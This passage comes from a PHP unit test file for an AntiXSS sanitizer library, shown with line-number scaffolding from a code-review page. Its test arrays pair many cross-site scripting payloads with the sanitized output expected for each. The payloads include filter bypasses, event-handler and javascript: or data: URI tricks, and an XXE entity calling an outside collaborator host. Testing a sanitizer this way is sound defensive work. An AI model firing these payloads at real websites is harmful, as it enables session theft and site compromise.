|
|
|
'something onendtest' => 'something onendtest', |
|
106
|
|
|
'something onend another thing' => 'something onend another thing', |
|
107
|
|
|
'something@onendtest' => 'something@onendtest', |
|
108
|
|
|
'something-onendtest' => 'something-onendtest', |
|
109
|
|
|
'something,onendtest' => 'something,onendtest', |
|
110
|
|
|
'something*onendtest' => 'something*onendtest', |
|
111
|
|
|
'something(onendtest' => 'something(onendtest', |
|
112
|
|
|
'something)onendtest' => 'something)onendtest', |
|
113
|
|
|
'something&onendtest' => 'something&onendtest', |
|
114
|
|
|
'something%onendtest' => 'something%onendtest', |
|
115
|
|
|
'something\'onendtest' => 'something\'onendtest', |
|
116
|
|
|
'something"onendtest' => 'something"onendtest', |
|
117
|
|
|
'something!onendtest' => 'something!onendtest', |
|
118
|
|
|
'something.onendtest' => 'something.onendtest', |
|
119
|
|
|
'something#onendtest' => 'something#onendtest', |
|
120
|
|
|
'something[onendtest' => 'something[onendtest', |
|
121
|
|
|
'something$onendtest' => 'something$onendtest', |
|
122
|
|
|
'<a href="https://wiki.product.net/FAQ.Error_during_connect_to_Database_(0)">link</a>' => '<a href="https://wiki.product.net/FAQ.Error_during_connect_to_Database_(0)">link</a>', |
|
123
|
|
|
'<a href="https://example.com/?onlyEnabled=1">link</a>' => '<a href="https://example.com/?onlyEnabled=1">link</a>', |
|
124
|
|
|
'<a href="https://example.com/?onlyEnabled=123123foo">link</a>' => '<a href="https://example.com/?onlyEnabled=123123foo">link</a>', |
|
125
|
|
|
]; |
|
126
|
|
|
|
|
127
|
|
|
$this->antiXss->removeEvilAttributes(['style']); // allow style-attributes |
|
128
|
|
|
|
|
129
|
|
View Code Duplication |
foreach ($testArray as $before => $after) { |
|
|
|
|
|
|
130
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
131
|
|
|
static::assertFalse($this->antiXss->isXssFound(), 'testing: ' . $before . ' | ' . $after); |
|
132
|
|
|
} |
|
133
|
|
|
|
|
134
|
|
|
$this->antiXss->addEvilAttributes((['style'])); // re-disallow style-attributes |
|
135
|
|
|
} |
|
136
|
|
|
|
|
137
|
|
View Code Duplication |
public function testRemoveAddEvents() |
|
|
|
|
|
|
138
|
|
|
{ |
|
139
|
|
|
$testArray = [ |
|
140
|
|
|
'<x 1=">" onxxx=1 onAbort="alert(\'foo\');" (text outside tag)' => '<x 1=">" onxxx=1 onAbort="alert(\'foo\');" (text outside tag)', |
|
141
|
|
|
]; |
|
142
|
|
|
|
|
143
|
|
|
$this->antiXss->removeNeverAllowedOnEventsAfterwards(['onAbort']); // allow |
|
144
|
|
|
|
|
145
|
|
|
foreach ($testArray as $before => $after) { |
|
146
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
147
|
|
|
} |
|
148
|
|
|
|
|
149
|
|
|
$this->antiXss->addNeverAllowedOnEventsAfterwards(['onAbort']); // re-disallow |
|
150
|
|
|
|
|
151
|
|
|
// --- |
|
152
|
|
|
|
|
153
|
|
|
$testArray = [ |
|
154
|
|
|
'<x foo="+ - & ? ! ö ä ? `" 1=">" onxxx=1 onAbort="alert(\'foo\');" (text outside tag)' => '<x foo="+ - & ? ! ö ä ? `" 1=">" onxxx=1 ="alert(\'foo\');" (text outside tag)', |
|
155
|
|
|
]; |
|
156
|
|
|
|
|
157
|
|
|
foreach ($testArray as $before => $after) { |
|
158
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
159
|
|
|
} |
|
160
|
|
|
} |
|
161
|
|
|
|
|
162
|
|
View Code Duplication |
public function testRemoveAddRegex() |
|
|
|
|
|
|
163
|
|
|
{ |
|
164
|
|
|
$testArray = [ |
|
165
|
|
|
'<!-- <x 1=">" onxxx=1 onAbort="alert(\'foo\');" (text outside tag) -->' => '<!-- <x 1=">" onxxx=1 ="alert(\'foo\');" (text outside tag) -->', |
|
166
|
|
|
]; |
|
167
|
|
|
|
|
168
|
|
|
$this->antiXss->removeNeverAllowedRegex(['<!--(.*)-->' => '<!--$1-->']); // allow |
|
169
|
|
|
|
|
170
|
|
|
foreach ($testArray as $before => $after) { |
|
171
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
172
|
|
|
} |
|
173
|
|
|
|
|
174
|
|
|
$this->antiXss->addNeverAllowedRegex(['<!--(.*)-->' => '<!--$1-->']); // re-disallow |
|
175
|
|
|
|
|
176
|
|
|
// --- |
|
177
|
|
|
|
|
178
|
|
|
$testArray = [ |
|
179
|
|
|
'<!-- <x 1=">" onxxx=1 onAbort="alert(\'foo\');" (text outside tag) -->' => '<!-- <x 1=">" onxxx=1 ="alert(\'foo\');" (text outside tag) -->', |
|
180
|
|
|
]; |
|
181
|
|
|
foreach ($testArray as $before => $after) { |
|
182
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
183
|
|
|
} |
|
184
|
|
|
} |
|
185
|
|
|
|
|
186
|
|
|
public function testXssCleanStringWith3bytes() |
|
187
|
|
|
{ |
|
188
|
|
|
$harmStrings = [ |
|
189
|
|
|
"Hello, i try to <script>alert('Hack');</script> your site" => 'Hello, i try to [removed] your site', |
|
190
|
|
|
'Simple clean string' => 'Simple clean string', |
|
191
|
|
|
"Hello, i try to <script>alert('Hack')</script> your site" => 'Hello, i try to [removed] your site', |
|
192
|
|
|
'<a href="http://test.com?param1="+onMouseOver%3D"alert%281%29%3B&step=2¶m12=A">test</a>' => '<a href="http://test.com?param1=">test</a>', |
|
193
|
|
|
'<a href="http://test.com?param1="+on💩MouseOver💩%3D"alert%281%29%3B&step=2¶m12=A">test</a>' => '<a href="http://test.com?param1=">test</a>', |
|
194
|
|
|
'<a href="http://test.com?param1=lall&colon=foo;">test</a>' => '<a href="http://test.com?param1=lall&colon=foo;">test</a>', |
|
195
|
|
|
'<a href="http://test.com?param1=lall:=foo;">test</a>' => '<a href="http://test.com?param1=lall:=foo;">test</a>', |
|
196
|
|
|
'<a href="http://test.com?param1=lall&colon+lall;">test</a>' => '<a href="http://test.com?param1=lall&colon+lall;">test</a>', |
|
197
|
|
|
'<a href="javascript:alert(\'xss\')">xss</a>' => '<a href="[removed](\'xss\')">xss</a>', |
|
198
|
|
|
'<li style="list-style-image: url(alert(0))">' => '<li [removed]>', |
|
199
|
|
|
]; |
|
200
|
|
|
|
|
201
|
|
|
$this->antiXss->setReplacement('[removed]'); |
|
202
|
|
|
$this->antiXss->setStripe4byteChars(true); |
|
203
|
|
|
|
|
204
|
|
|
foreach ($harmStrings as $before => $after) { |
|
205
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
206
|
|
|
} |
|
207
|
|
|
|
|
208
|
|
|
// reset |
|
209
|
|
|
$this->antiXss->setReplacement('')->setStripe4byteChars(false); |
|
210
|
|
|
} |
|
211
|
|
|
|
|
212
|
|
|
public function testXssCleanStringArray() |
|
213
|
|
|
{ |
|
214
|
|
|
$harmStrings = [ |
|
215
|
|
|
'<input name="product" value="GOM-KC-350+550">' => '<input name="product" value="GOM-KC-350+550">', |
|
216
|
|
|
'<style type="text/css">html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}</style>' => '<style type="text/css">html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}</style>', |
|
217
|
|
|
'<meta name="viewport" content="width=device-width, initial-scale=1.0, minimal-ui">' => '<meta name="viewport" content="width=device-width, initial-scale=1.0, minimal-ui">', |
|
218
|
|
|
'<meta property="og:description" content="Lars Moelleken: Webentwickler & Sysadmin aus Krefeld" />' => '<meta property="og:description" content="Lars Moelleken: Webentwickler & Sysadmin aus Krefeld" />', |
|
219
|
|
|
'<meta name="viewport" content="width=device-width, initial-scale=1.0, minimal-ui">' => '<meta name="viewport" content="width=device-width, initial-scale=1.0, minimal-ui">', |
|
220
|
|
|
'<link href="//fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css"/>' => '<link href="//fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css"/>', |
|
221
|
|
|
'<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>' => '[removed][removed]', |
|
222
|
|
|
'<!--[if lt IE 9]><script src="http://moelleken.org/vendor/bower/nwmatcher/src/nwmatcher.js"></script><![endif]-->' => '<!--[if lt IE 9]>[removed][removed]<![endif]-->', |
|
223
|
|
|
"Hello, i try to <script>alert('Hack');</script> your site" => 'Hello, i try to [removed] your site', |
|
224
|
|
|
'Simple clean string' => 'Simple clean string', |
|
225
|
|
|
"Hello, i try to <script>alert('Hack')</script> your site" => 'Hello, i try to [removed] your site', |
|
226
|
|
|
'<a href="http://test.com?param1="+onMouseOver%3D"alert%281%29%3B&step=2¶m12=A">test</a>' => '<a href="http://test.com?param1=">test</a>', |
|
227
|
|
|
'<a href="http://test.com?param1="+on💩MouseOver💩%3D"alert%281%29%3B&step=2¶m12=A">test💩</a>' => '<a href="http://test.com?param1=">test💩</a>', |
|
228
|
|
|
'<a href="http://test.com?param1=lall&colon=foo;">test</a>' => '<a href="http://test.com?param1=lall&colon=foo;">test</a>', |
|
229
|
|
|
'<a href="http://test.com?param1=lall:=foo;">test</a>' => '<a href="http://test.com?param1=lall:=foo;">test</a>', |
|
230
|
|
|
]; |
|
231
|
|
|
|
|
232
|
|
|
$this->antiXss->setReplacement('[removed]'); |
|
233
|
|
|
|
|
234
|
|
|
foreach ($harmStrings as $before => $after) { |
|
235
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
236
|
|
|
} |
|
237
|
|
|
|
|
238
|
|
|
// reset |
|
239
|
|
|
$this->antiXss->setReplacement(''); |
|
240
|
|
|
} |
|
241
|
|
|
|
|
242
|
|
|
public function testXssCleanImageValid() |
|
243
|
|
|
{ |
|
244
|
|
|
$harm_string = '<img src="test.png">'; |
|
245
|
|
|
|
|
246
|
|
|
$xss_clean_return = $this->antiXss->xss_clean($harm_string); |
|
247
|
|
|
|
|
248
|
|
|
static::assertTrue($xss_clean_return === $harm_string); |
|
249
|
|
|
} |
|
250
|
|
|
|
|
251
|
|
|
public function testXssCleanImageInvalid() |
|
252
|
|
|
{ |
|
253
|
|
|
$harm_string = '<img src=javascript:alert(String.fromCharCode(88,83,83))>'; |
|
254
|
|
|
|
|
255
|
|
|
$xss_clean_return = $this->antiXss->xss_clean($harm_string); |
|
256
|
|
|
|
|
257
|
|
|
static::assertFalse($xss_clean_return === $harm_string); |
|
258
|
|
|
} |
|
259
|
|
|
|
|
260
|
|
|
public function testXssWithoutStartHtml() |
|
261
|
|
|
{ |
|
262
|
|
|
$testArray = [ |
|
263
|
|
|
'ads="onClick();" foo="555-666-0606" bar([!+!]) ody="" ></a>' => 'ads="();" foo="555-666-0606" bar([!+!]) ody="" ></a>', |
|
264
|
|
|
]; |
|
265
|
|
|
|
|
266
|
|
|
$antiXss = new AntiXSS(); |
|
267
|
|
|
foreach ($testArray as $test => $expected) { |
|
268
|
|
|
static::assertSame($expected, $antiXss->xss_clean($test)); |
|
269
|
|
|
} |
|
270
|
|
|
} |
|
271
|
|
|
|
|
272
|
|
|
public function testXssHash() |
|
273
|
|
|
{ |
|
274
|
|
|
$antiXss = new AntiXSS(); |
|
275
|
|
|
static::assertNull($antiXss->isXssFound()); |
|
276
|
|
|
|
|
277
|
|
|
// init the "_xss_hash"-property |
|
278
|
|
|
$result = $antiXss->xss_clean('<void class="bar">foo</ onclick = "foobar();" void>'); |
|
279
|
|
|
static::assertSame('<void class="bar">foo</ void>', $result); |
|
280
|
|
|
static::assertTrue($antiXss->isXssFound()); |
|
281
|
|
|
|
|
282
|
|
|
// --- |
|
283
|
|
|
|
|
284
|
|
|
$result = $antiXss->xss_clean('<void class="bar">foo</void>'); |
|
285
|
|
|
static::assertSame('<void class="bar">foo</void>', $result); |
|
286
|
|
|
static::assertFalse($antiXss->isXssFound()); |
|
287
|
|
|
} |
|
288
|
|
|
|
|
289
|
|
|
public function testXssClean() |
|
290
|
|
|
{ |
|
291
|
|
|
$harm_string = "Hello, i try to <script>alert('Hack');</script> your site"; |
|
292
|
|
|
|
|
293
|
|
|
$harmless_string = $this->antiXss->xss_clean($harm_string); |
|
294
|
|
|
|
|
295
|
|
|
static::assertSame('Hello, i try to your site', $harmless_string); |
|
296
|
|
|
|
|
297
|
|
|
// \v (vertical whitespace) isn't working on travis-ci ? |
|
298
|
|
|
|
|
299
|
|
|
$testArray = [ |
|
300
|
|
|
'<div BACKGROUND="mocha:alert(\'XSS\')"> |
|
301
|
|
|
<!-- image:xss --> |
|
302
|
|
|
<IMG SRC=javascript:alert('XSS')> |
|
303
|
|
|
<IMG SRC="jav	ascript:alert(\'XSS\');"> |
|
304
|
|
|
<img/src=`%00`" . \n . "onerror=this.onerror=confirm(1)> |
|
305
|
|
|
<img/src=`%00` onerror=this.onerror=confirm(1) |
|
306
|
|
|
<!-- file:xss --> |
|
307
|
|
|
<script SRC="http://absynth.de/x.js"></script> |
|
308
|
|
|
<layer SRC="http://absynth.de/x.js"></layer> |
|
309
|
|
|
<!-- style:xss --> |
|
310
|
|
|
<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');"> |
|
311
|
|
|
<DIV STYLE="background-image: url(javascript:alert(\'XSS\')"> |
|
312
|
|
|
<div style=background-image:expression(alert(\'XSS\'));">lall</div> |
|
313
|
|
|
</div> |
|
314
|
|
|
</div>' => '<div BACKGROUND="(\'XSS\')"> |
|
315
|
|
|
<!-- image:xss --> |
|
316
|
|
|
<IMG > |
|
317
|
|
|
& REL="stylesheet" HREF="(\'XSS\');"', |
|
318
|
|
|
'<img/src=">" onerror=alert(1)> |
|
319
|
|
|
<button/a=">" autofocus onfocus=alert(1(></button> |
|
320
|
|
|
<button a=">" autofocus onfocus=alert(1(>' => '<img/>" > |
|
321
|
|
|
& a=">"', // autofocus trick | https://html5sec.org/#7 |
|
322
|
|
|
'http://vulnerable.info/poc/poc.php?foo=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E' => 'http://vulnerable.info/poc/poc.php?foo=<svg></svg>', |
|
323
|
|
|
'"><svg><script>/<@/>alert(1337)</script>' => '"><svg>alert(1337)', // Bypassing Chrome’s Anti-XSS Filter | 2015: http://vulnerable.info/bypassing-chromes-anti-xss-filter/ |
|
324
|
|
|
'Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3csvg%2fonload%3dalert%28document%2edomain%29%3e%3b%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f' => 'Location: https://www.google.com:443/cse/tools/create_onthefly;</textarea><svg/>;/../../../../../../../../../../../../../../', // Google XSS in IE | 2015: http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html |
|
325
|
|
|
'Location: http://example.jp:xyz%27onclick%3D%27a%5Cu006c%5Cu0065%5Cu0072t(1)%27/2.php' => 'Location: http://example.jp:xyz\'=\'alert(1)\'/2.php', |
|
326
|
|
|
'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg=="/></feImage> </svg>' => '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage> <set attributeName="xlink:href" to="PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg=="/></feImage> </svg>', // SVG-XSS | https://html5sec.org/#95 |
|
327
|
|
|
'<a target="_blank" href="data:text/html;BASE64youdummy,PHNjcmlwdD5hbGVydCh3aW5kb3cub3BlbmVyLmRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5pbm5lckhUTUwpPC9zY3JpcHQ+">clickme in firefox</a><a/\'\'\' target="_blank" href=data:text/html;;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwpPC9zY3JpcHQ+>firefox11</a>' => '<a target="_blank" href="PHNjcmlwdD5hbGVydCh3aW5kb3cub3BlbmVyLmRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5pbm5lckhUTUwpPC9zY3JpcHQ+">clickme in firefox</a><a/\'\'\' target="_blank">firefox11</a>', // data: URI with base64 encoding bypass exploiting Firefox | 2012: https://bugzilla.mozilla.org/show_bug.cgi?id=255107 |
|
328
|
|
|
'http://securitee.tk/files/chrome_xss.php?a=<script>void(\'&b=\');alert(1);</script>' => 'http://securitee.tk/files/chrome_xss.php?a=', // Bypassing Chrome’s Anti-XSS filter | 2012: http://blog.securitee.org/?p=37 |
|
329
|
|
|
'with(document)body.appendChild(createElement(\'iframe onload=alert(1)>\')),body.innerHTML+=\'\'' => 'with(document)body(createElement(\'iframe =alert(1)>\')),body+=\'\'', // IE11 in IE8 docmode #mxss | https://twitter.com/0x6D6172696F/status/626379000181596160 |
|
330
|
|
|
'http://www.nowvideo.sx/share.php?id=foobar&title=\'\';with(document)body.appendChild(createElement(\\\'iframe onload =alert(1)>\\\')),body.innerHTML+=\\\'\\\'//\\\';with(document)body.appendChild(createElement(\\\'iframe onload=alert(1)>\\\')),body.innerHTML+=\\\'\\\'//";with(document)body.appendChild(createElement(\\\'iframe onload=alert(1)>\\\')),body.innerHTML+=\\\'\\\'//\";with(document)body.appendChild(createElement(\\\'iframe onload=alert(1)>\\\')),body.innerHTML+=\\\'\\\'//--></SCRIPT>">\'><SCRIPT>with(document)body.appendChild(createElement(\\\'iframe onload=alert(1)>\\\')),body.innerHTML+=\\\'\\\'</SCRIPT>=&{}' => "http://www.nowvideo.sx/share.php?id=foobar&title='';with(document)body(createElement(\'iframe =alert(1)>\')),body+=\'\'//\';with(document)body(createElement(\'iframe =alert(1)>\')),body+=\'\'//\";with(document)body(createElement(\'iframe =alert(1)>\')),body+=\'\'//\\\";with(document)body(createElement(\'iframe =alert(1)>\')),body+=\'\'//-->\">'>\')),body+=\'\'=&{}", |
|
331
|
|
|
'<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>' => '<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>', // 2016 | http://mksben.l0.cm/2016/05/xssauditor-bypass-flash-basetag.html |
|
332
|
|
|
'<base href="javascript:/a/+alert(1)//">' => '<base href="/a/+alert(1)//">', |
|
333
|
|
|
'<base href=data:/,alert(1)/>' => '<base href=data:/,alert(1)/>', |
|
334
|
|
|
'<base href=javascript:/0/><iframe src=,alert(1)></iframe>' => '<base href=/0/><iframe src=,alert(1)></iframe>', |
|
335
|
|
|
'<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://4mr71zbvk10c5vd1k074izfvbmhnxdi7xw.burpcollaborator.net"> ]>' => '<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://4mr71zbvk10c5vd1k074izfvbmhnxdi7xw.burpcollaborator.net"> ]>', // XXE injection | 2015: http://blog.portswigger.net/2015/05/burp-suite-now-reports-blind-xxe.html |
|
336
|
|
|
"<iframe name=alert(1) src=\"//somedomain?x=',__defineSetter__('x',eval),x=name,'\"></iframe>" => '<iframe name=alert(1) src="//somedomain?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', |
|
337
|
|
|
"<script>x = '',__defineSetter__('x',alert),x=1,'';</script>" => '', // NoScript XSS filter bypass | 2015: http://blog.portswigger.net/2015/07/noscript-xss-filter-bypass.html |
|
338
|
|
|
'"><a href="JAVASCRIPT:%E2%80%A8alert`1`">CLICKME 😃' => '"><a href="">CLICKME 😃', // NoScript XSS filter bypass | 2015: https://twitter.com/0x6D6172696F/status/623081477002014720?s=02 |
|
339
|
|
|
'<div id="b" style="font-family:a/**/ression(alert(1))(\'\\\')exp\\\')">aa</div>' => '<div id="b" >aa</div>', // IE | 2014: http://wooyun.org/bugs/wooyun-2014-068564 |
|
340
|
|
|
'<a href="jar:http://SEVER/flash3.bin!/flash3.swf">xss</a>' => '<a href="//SEVER/flash3.bin!/flash3.swf">xss</a>', // Firefox | 2007: https://bugzilla.mozilla.org/show_bug.cgi?id=369814 |
|
341
|
|
|
'<li><a href="?bypass=%3Clink%20rel=%22import%22%20href=%22?bypass=%3Cscript%3Ealert(document.domain)%3C/script%3E%22%3E">Now click to execute arbitrary JS</a></li>' => '<li><a href="" href="">">Now click to execute arbitrary JS</a></li>', // Chrome 33 | 2015: view-source:https://html5sec.org/test/bypass |
|
342
|
|
|
'<scr<script>ipt>alert(1)</sc<script>ri<script>pt>' => '<scralert(1)</scpt>', // 2015: https://frederic-hemberger.de/talks/froscon-xss/#/17 |
|
343
|
|
|
'<svg </onload ="1> (_=alert,_(1337)) "">' => '<svg </">', |
|
344
|
|
|
'<svg><script>/<@/>alert(1)</script>' => '<svg>alert(1)', |
|
345
|
|
|
'<svg/onload=alert`xss`>' => '<svg/>', // FF34+, Edge | 2015 | https://www.davidsopas.com/win-50-amazon-gift-card-with-a-xss-challenge/ |
|
346
|
|
|
'<script/src=//⑭.₨>' => '', // Edge | 2016 | https://twitter.com/0x6D6172696F/status/784356959063535616 |
|
347
|
|
|
'<p/onclick=alert(/xss/)>a' => '<p/>a', |
|
348
|
|
|
'<iframe/src=//14.rs>' => '<iframe/src=//14.rs>', |
|
349
|
|
|
'<iframe src="https:http://example.com ">' => '<iframe src="https:http://example.com ">', |
|
350
|
|
|
'<p/oncut=alert`xss`>x' => '<p/>x', |
|
351
|
|
|
'<svg/onload=alert(/XSS/)>' => '<svg/>', // FF40 | 2015 | https://www.davidsopas.com/win-50-amazon-gift-card-with-a-xss-challenge/ |
|
352
|
|
|
'<http://onclick%3d1/alert%601%60//' => '<http://', // 2015 | https://twitter.com/brutelogic/status/673098162635202560 |
|
353
|
|
|
'<a href="data: , < 
 script > alert(1) < /script > ">CLICK' => '<a href="">CLICK', // FF45 | 2016 | https://twitter.com/0x6D6172696F/status/716364272889176064 |
|
354
|
|
|
'http://www.wolframalpha.com/input/?i=1&n=%22%3E%3Cscript%20src=//3237054390/1%3E' => 'http://www.wolframalpha.com/input/?i=1&n=">', // 2015 | https://twitter.com/brutelogic/status/671740844450426880 |
|
355
|
|
|
'<svg onload=1?alert(9):0>' => '<svg >', // 2015 | https://twitter.com/brutelogic/status/669852435209416704 |
|
356
|
|
|
'<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <' => '<style>@KeyFrames x{</style><div > <', // Chrome | 2016 | https://twitter.com/0x6D6172696F/status/669183179165720576 |
|
357
|
|
|
'<style>:target{zoom:2;transition:1s}</style><div id=x ontransitionend=alert(1)>' => '<style>:target{zoom:2;transition:1s}</style><div id=x >', // https://twitter.com/cgvwzq/status/684316889221337088 |
|
358
|
|
|
'<brute contenteditable onblur=alert(1)>lose focus!<brute onclick=alert(1)>click this!<brute oncopy=alert(1)>copy this!<brute oncontextmenu=alert(1)>right click this!<brute oncut=alert(1)>copy this!<brute ondblclick=alert(1)>double click this!<brute ondrag=alert(1)>drag this!<brute contenteditable onfocus=alert(1)>focus this!<brute contenteditable oninput=alert(1)>input here!<brute contenteditable onkeydown=alert(1)>press any key!<brute contenteditable onkeypress=alert(1)>press any key!<brute contenteditable onkeyup=alert(1)>press any key!<brute onmousedown=alert(1)>click this!<brute onmousemove=alert(1)>hover this!<brute onmouseout=alert(1)>hover this!<brute onmouseover=alert(1)>hover this!<brute onmouseup=alert(1)>click this!<brute contenteditable onpaste=alert(1)>paste here!<brute style=font-size:500px onmouseover=alert(1)>0000' => '<brute contenteditable >lose focus!<brute >click this!<brute >copy this!<brute >right click this!<brute >copy this!<brute >double click this!<brute >drag this!<brute contenteditable >focus this!<brute contenteditable >input here!<brute contenteditable >press any key!<brute contenteditable >press any key!<brute contenteditable >press any key!<brute >click this!<brute >hover this!<brute >hover this!<brute >hover this!<brute >click this!<brute contenteditable >paste here!<brute >0000', // 2015 | http://brutelogic.com.br/blog/agnostic-event-handlers/ |
|
359
|
|
|
'<x contextmenu=">"><acronym%0Cx=""%09oncut+=%09d=document;a=d.createElement("a");a.href="img/hacked1.jpg";a.download="open.me";d.body.appendChild(a);a.click()+><option><input type=submit>' => '<x contextmenu=">"><acronym x=""%09+=%09d=document;a=d.createElement("a");a.href="img/hacked1.jpg";a.download="open.me";d.body(a);a.click()+><option><input type=submit>', // http://brutelogic.com.br/webgun/ |
|
360
|
|
|
'<h1/onclick=alert(1)>a' => '<h1/>a', |
|
361
|
|
|
'")}alert(/XSS/);{//' => '")}alert(/XSS/);{//', |
|
362
|
|
|
'<svg onload=alert(1)>' => '<svg >', // 2015: https://twitter.com/ret2libc/status/635923671681507328 |
|
363
|
|
|
"<style onload='execScript(/**/\"\x61lert( 1)\",\"j\x61vascript\");'>" => '<style >', // IE | 2015: https://twitter.com/soaj1664ashar/status/635040931289370624 |
|
364
|
|
|
'<script>alert `1`</script>' => '', |
|
365
|
|
|
'<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>' => '<form id="test"></form><button >X</button>', |
|
366
|
|
|
'<input onfocus=write(1) autofocus>' => '<input autofocus>', |
|
367
|
|
|
'<input onblur=write(1) autofocus><input autofocus>' => '<input autofocus><input autofocus>', |
|
368
|
|
|
'<video poster=javascript:alert(1)//></video>' => '<video /></video>', |
|
369
|
|
|
'<Video> <source onerror = "javascript: alert (XSS)">' => '<Video> < >', |
|
370
|
|
|
'<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>' => '<body ><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', |
|
371
|
|
|
'<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>' => '<form id=test ><input></form><button >X</button>', |
|
372
|
|
|
'<video><source onerror="alert(1)">' => '<video>< >', |
|
373
|
|
|
'<video onerror="alert(1)"><source></source></video>' => '<video ><source></source></video>', |
|
374
|
|
|
'<form><button formaction="javascript:alert(1)">X</button>' => '<form><button >X</button>', |
|
375
|
|
|
'<body oninput=alert(1)><input autofocus>' => '<body ><input autofocus>', |
|
376
|
|
|
'<math href="javascript:alert(1)">CLICKME</math>' => '<math href="(1)">CLICKME</math>', |
|
377
|
|
|
'<math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>' => '<math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" >CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" >CLICKME<mtext>http://http://google.com</mtext></maction> </math>', |
|
378
|
|
|
'<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">' => '< img[a][b]src=x[d][c]=[e]"alert(1)">', |
|
379
|
|
|
'<a href="[a]java[b]script[c]:alert(1)">XXX</a>' => '<a href="">XXX</a>', |
|
380
|
|
|
'<form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>' => '<form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>', |
|
381
|
|
|
'<link rel="import" href="test.svg" />' => '<link rel="import" href="test.svg" />', |
|
382
|
|
|
'<iframe srcdoc="<img src=x:x onerror=alert(1)>" />' => '<iframe srcdoc="<img >" />', |
|
383
|
|
|
'<picture><source srcset="x"><img onerror="alert(1)"></picture>' => '<picture><source srcset="x"><img ></picture>', |
|
384
|
|
|
'<picture><img srcset="x" onerror="alert(1)"></picture>' => '<picture><img srcset="x" ></picture>', |
|
385
|
|
|
'<img srcset=",,,,,x" onerror="alert(1)">' => '<img srcset=",,,,,x" >', |
|
386
|
|
|
'<table background="javascript:alert(1)"></table>' => '<table background="(1)"></table>', |
|
387
|
|
|
'<comment><img src="</comment><img src=x onerror=alert(1)//">' => '<comment><img ><img ">', |
|
388
|
|
|
'<![><img src="]><img src=x onerror=alert(1)//">' => '<![><img ><img ">', // up to Opera 11.52, FF 3.6.28 |
|
389
|
|
|
'<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>' => '<svg><![CDATA[><image ></svg>', // IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ |
|
390
|
|
|
'<img src onerror /" \'"= alt=alert(1)//">' => '<img >', |
|
391
|
|
|
'?x=<img+src=x+onerror=`ö`-alert(1)>' => '?x=<img+>', // Chrome 2016/07 |
|
392
|
|
|
'<audio src=data:;base64,//MUxHNtYWxsZXN0LW1wMy1ieS1AcWFi//MUxCc+Ij4vPlw+PHN2Zy9vbmxvYWQ9//MUxGFsZXJ0KCdAcWFiJyk7cWFiYW5k//MUxA oncanplay=XSS' => '<audio ', |
|
393
|
|
|
'<meta http-equiv=x-ua-compatible content=ie=8>1<comment onresize=alert(1) contenteditable>1' => '<meta http-equiv=x-ua-compatible content=ie=8>1<comment contenteditable>1', // IE11 |
|
394
|
|
|
'<?xml version="1.0" encoding="utf-8" ?><x:script |
|
395
|
|
|
